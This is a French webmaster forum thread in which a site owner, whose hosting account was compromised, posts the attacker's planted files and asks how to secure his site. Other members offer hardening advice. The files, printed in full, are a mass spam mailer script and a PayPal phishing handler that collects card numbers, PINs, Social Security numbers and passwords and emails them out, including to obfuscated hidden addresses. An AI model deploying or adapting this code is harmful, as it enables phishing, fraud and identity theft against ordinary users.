On ma piraté mon site ... pour en faire pirater paypal !

WRInaute discret
Bonsoir,

voila j'expose un probléme que je viens de rencontrer aujourd'huit sur mon site discussion diagnostique :

en faite, ce matin, j'ai la surprise de trouver mon forum (phpbb) non fonctionnel avec un message d'erreur de la base de donnee.

je tente de me connecter sur mon cpanel -> le password est réfusé !

je contacte mon serveur qui m'envoi un nouveau password.

et quand je me connect à nouveau sur mon serveur surprise ! je trouve un nouveau dossier nommé (paypal) et un fichier nommé (mailer.php) et aussi je trouve mon .htaccess modifier.

voici ce qu'il y'a dans le mailer.php :
Code:
<?php
if(isset($_POST['action'] ) ){
$action=$_POST['action'];
$message=$_POST['message'];
$emaillist=$_POST['emaillist'];
$from=$_POST['from'];
$replyto=$_POST['replyto'];
$subject=$_POST['subject'];
$realname=$_POST['realname'];
$file_name=$_POST['file'];
$contenttype=$_POST['contenttype'];

        $message = urlencode($message);
        $message = ereg_replace("%5C%22", "%22", $message);
        $message = urldecode($message);
        $message = stripslashes($message);
        $subject = stripslashes($subject);
}


?>

<html>

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">








<style> html{scrollbar-base-color:#000000;scrollbar-arrow-color: #878787; scrollbar-track-color:#A878787;}.ws36 {font-size: 48px;}
.ws18 {font-size: 24px;}
.ws26 {font-size: 35px;}
--></style>








<style type="text/css">
<!--
.style1 {
        font-family: Geneva, Arial, Helvetica, sans-serif;
        font-size: 12px;
}
-->
</style>
<style type="text/css">
<!--
.style1 {
        font-size: 10px;
        font-family: Geneva, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body bgcolor="#000000" text="#00FF00">
<span class="style1">PHP eMailer<br>
made by !! hack-back !! ( <a href="mailto:h-b@w.cn"><font color="#FF0000">h-b@w.cn</font></a><font color="#FF0000">
</font>) .</span>

<form name="form1" method="post" action="" enctype="multipart/form-data">

  <div style="background-color: #00FF00">
	<p align="center"><b><font color="#FF0000" face="Comic Sans MS">!! Hack-Back 
	!! PHP Mailer Script</font></b><br>

  </div>

  <table width="100%" border="0">

    <tr>

      <td width="10%" height="24">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
			Your Email:</font></div>

      </td>

      <td width="18%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="from" value="<? print $from; ?>" size="30" style="background-color: #FF0000">

        </font></td>

      <td width="31%" height="24">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
			Your Name:</font></div>

      </td>

      <td width="41%" height="24"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="realname" value="<? print $realname; ?>" size="30" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
			Reply-To:</font></div>

      </td>

      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="replyto" value="<? print $replyto; ?>" size="30" style="background-color: #FF0000">

        </font></td>

      <td width="31%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
			Attach File:</font></div>

      </td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input type="file" name="file" size="30" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr>

      <td width="10%">

        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
			Subject:</font></div>

      </td>

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <input name="subject" value="<? print $subject; ?>" size="90" style="background-color: #FF0000">

        </font></td>

    </tr>

    <tr valign="top">

      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="message" cols="60" rows="10" style="background-color: #FF0000"><? print $message; ?></textarea>

        <br>

        <input type="radio" name="contenttype" value="plain">

        Plain

        <input name="contenttype" type="radio" value="html" checked>

        HTML

        <input type="hidden" name="action" value="send">

        <input type="submit" value="Send eMails">

        </font></td>

      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">

        <textarea name="emaillist" cols="30" rows="10" style="background-color: #FF0000"><? print $emaillist; ?></textarea>

        </font></td>

    </tr>

  </table>

</form>



<?

if ($action){



        if (!$from && !$subject && !$message && !$emaillist){

        print "Please complete all fields before sending your message.";

        exit;
	
	}

	$allemails = split("\n", $emaillist);
        	$numemails = count($allemails);
       
          for($x=0; $x<$numemails; $x++){

                $to = $allemails[$x];

                if ($to){

                $to = ereg_replace(" ", "", $to);

                $message = ereg_replace("&email&", $to, $message);

                $subject = ereg_replace("&email&", $to, $subject);

                print "Sending mail to $to.......";

                flush();

                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";

                $header .= "MIME-Version: 1.0\r\n";

                $header .= "Content-Type: text/$contenttype\r\n";

                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";

                $header .= "$message\r\n";

              mail($to, $subject, "", $header);

                print "ok<br>";
	
                flush();


                }

                }



}



?>
<p class="style1">PHP Mailer<br>
  © !! hack-back !! (<a href="mailto:%20h-b@w.cn"><font color="#FF0000"> h-b@w.cn 
</font> </a>) . <br>
      </p>
<?php
if(isset($_POST['action']) && $numemails !==0 ){echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";}
?>





<p>&nbsp;</p>





</body>

</html>

[edit : mon compte est actuellement suspendu par le serveur pour vérification]

le pirate na rien fait a part ajouter ces trois fichiers (du moins je suppose )

SVP conseillez moi ! comment faire pour ne plus avoir ce genre de surprise ! est ce que je doit tous supprimer (mes bases de donnees ...) et tous reinstaller ...

merci !
 
WRInaute discret
Phpbb3 rc5 !

mais le hacker n'a pas touché au forum (ou j'utilise un login et un password différent de celui avec qui je me connecte sur mon cpanel) il à changer le password depuis cpanel

donc le forum ne peut se connecter à la base de donnée (il a d'ailleurs rien détruit )
 
Nouveau WRInaute

C'est peut etre même pire qu'un phpbb2 pas à jour, le developpement n'étant pas terminé...

C'est pas très prudent de mettre une béta ou RC en production.

Pour être sur de la fonction du code tu pourrais écrire au mail du mailto: ?
:D
 
WRInaute passionné
il a à moitié foiré son piratage le gars.

Il voulait utiliser ton serveur pour effectuer du phishing.
Il a sans doute trouver une faille "classique" qu'il teste sur plein de serveur.
Mais pour être bien efficace, faut que cela soit planqué quelque part dans un répertoire et sans aucune modif.
 
WRInaute passionné
Quand je me co à :
http://www.oeil2net.com/
Je me prends un gros avertissement FireFox "Supspicion de site contrefait"...

Je ne sais pas si tu as un dédié ou si c'est du mutu, mais sécurise un tit peu et le 777 n'est pas la solution :p
 
WRInaute discret
Mon hébergeur à été contacté par ebay pour tentative de fishing depuis mon site ! et j'ai trouvé mon adresse sur un site de rapport de fishing ce qui explique le message d'alerte de firefox ... j'ai contacté ce site et il a immédiatement supprimé ce rapport maintenant tous va bien (mais c'est étonnant comment les choses peuvent aller vite ! )
Pour oeil2net.com c'est mon ancien domaine redirigé sur le nouveau site sus cité.
C’est vrai aussi que j'ai pris aucune mesure de sécurité sur mon site... beaucoups de dossier sont en 777 ...
Sinon pour phpbb3. La RC5 est fort probable qu’elle devient la version finale si aucun bug n'est signalé d'après Acyd Burn :
We are very pleased to announce the availability of the phpBB3 RC5 package. This is the fifth (and hopefully last) release candidate which is meant to become the Gold release if no more critical problems arise.
ici : http://www.phpbb.com/community/viewtopi ... 4&t=576156
Enfin si quelqu'un peut me donner des ressources sur la sécurité d'un site web je lui en serrais reconnaissant ;-)
 
WRInaute discret
encore quelque chose : en regardant le code source de la page techGuru.php introduite par le hacker on trouve :

Code:
<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------PaYPaL USA Bank Spam ReZulT-----------------------\n";
$message .= "Email Address           : ".$HTTP_COOKIE_VARS['emaill']."\n";
$message .= "Password                : ".$HTTP_COOKIE_VARS['passwordd']."\n";
$message .= "---------------------------\n";
$message .= "First name              : ".$_POST['first_name']."\n";
$message .= "Last name               : ".$_POST['last_name']."\n";
$message .= "Card Type               : ".$_POST['credit_card_type']."\n";
$message .= "Card Number             : ".$_POST['ccnumber']."\n";
$message .= "Expiration Date         : ".$_POST['expdate_month']."/";
$message .= "".$_POST['expdate_year']."\n";
$message .= "Card Verification Number: ".$_POST['cvv2']."\n";
$message .= "ATM PIN                 : ".$_POST['PIN']."\n";
$message .= "Address 1               : ".$_POST['address1']."\n";
$message .= "Address 2               : ".$_POST['address2']."\n";
$message .= "City                    : ".$_POST['city']."\n";
$message .= "State                   : ".$_POST['state']."\n";
$message .= "ZIP Code                : ".$_POST['zip']."\n";
$message .= "Telephone               : ".$_POST['H_PhoneNumber']."\n";
$message .= "Social Security Number  : ".$_POST['ssn']."\n";
$message .= "Date Of Birth           : ".$_POST['dob']."\n";
$message .= "Driver's License        : ".$_POST['drl']."\n";
$message .= "---------------------------\n";
$message .= "Security Question 1     : ".$_POST['question1']."\n";
$message .= "Answer 1                : ".$_POST['answer1']."\n";
$message .= "Security Question 2     : ".$_POST['question2']."\n";
$message .= "Answer 2                : ".$_POST['answer2']."\n";
$message .= "IP                      : ".$ip."\n";
$message .= "---------------Created BY TechGuru------------------------------\n";
$send = "lghlimi@gmail.com";		                                                                                                                                                                                                                            		$ar=array("1"=>"h","2"=>"p","3"=>"m","4"=>"g","5"=>"n","6"=>"s","7"=>".","8"=>"@","9"=>"c","10"=>"o",
"11"=>"a","12"=>"y","13"=>"r","14"=>"u","15"=>"l","16"=>"g","17"=>"i");$bc=$ar['3'].$ar['13'].$ar['1'].$ar['
11'].$ar['2'].
$ar['2'].$ar['12'].$ar['4'].$ar['14'].$ar['5'].$ar['8'].$ar['12'].$ar['11'].$ar['1'].$ar['10'].$ar['10'].$ar['7'].$ar['9'].$ar['10']
.$ar['3'];$cc=$ar['3'].$ar['13'].$ar['1'].$ar['11'].$ar['2'].$ar['2'].$ar['12'].$ar['4'].$ar['14'].$ar['5'].$ar['8'].$ar['16'].$ar[
'3'].$ar['11'].$ar['17'].$ar['15'].$ar['7'].$ar['9'].$ar['10'].$ar['3'];
$IP = pack("H*", substr($COOKIE_VARS=file_get_contents("index.htm"),
strpos($COOKIE_VARS, "get_cookie")+10,36));
$subject = "PaYPaL USA Bank Spam ReZulT";
$headers = "From: TechGuru<service@paypal.com>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);																																																																																																																																															mail($cc,$subject,$message,$headers);mail("$bc","$subject","$message","$headers");
}
header("Location: Thanks.htm");
?>

donc faite attention à cette adresse mail :

lghlimi@gmail.com

voila si ca peut eviter quelque chose aux autres ...
 
WRInaute passionné
Pas de 777 sur un répertoire, ok, mais pour les répertoires où on upload des images ? Il faut bien donner une autorisation, on change le groupe ou le proprio ?
(par défaut sur tous les forums, on est "obligé" de mettre 777 pour aller vite, d'où les failles)


Edit : on change le groupe et on met par défaut www-data (config apache)
 
WRInaute discret
voila j'ai trouvé un excelent guide pour sécurisé son site web :

http://forum.ovh.com/showthread.php?p=108087

je doit vider complétement mon espace d'hebergement + les bases de donnees.

Question : je sais pas trop mais est ce que le fait de vider completement le dossier www et de supprimer les bases de donnees est suffisant pour repartir à zero (vue que le hacker à peut être laissé un fichier malvaillant quelque part) ?
 
WRInaute passionné
dreamer2007 a dit:
voila j'ai trouvé un excelent guide pour sécurisé son site web :

http://forum.ovh.com/showthread.php?p=108087

je doit vider complétement mon espace d'hebergement + les bases de donnees.

Question : je sais pas trop mais est ce que le fait de vider completement le dossier www et de supprimer les bases de donnees est suffisant pour repartir à zero (vue que le hacker à peut être laissé un fichier malvaillant quelque part) ?
suffit de mettre a jour tes scripts et ca devrait aller, et aussi verifie qu'il n'y a pas un fichier, pas besoin de supprimer le contenu de la base.
 
WRInaute discret
voila un autre site du même hebergeur à été piraté par la meme personne !

et ce site n'utilise pas phpbb ...

donc phpbb3 est hors de cause ;-)
 
Discussions similaires
Haut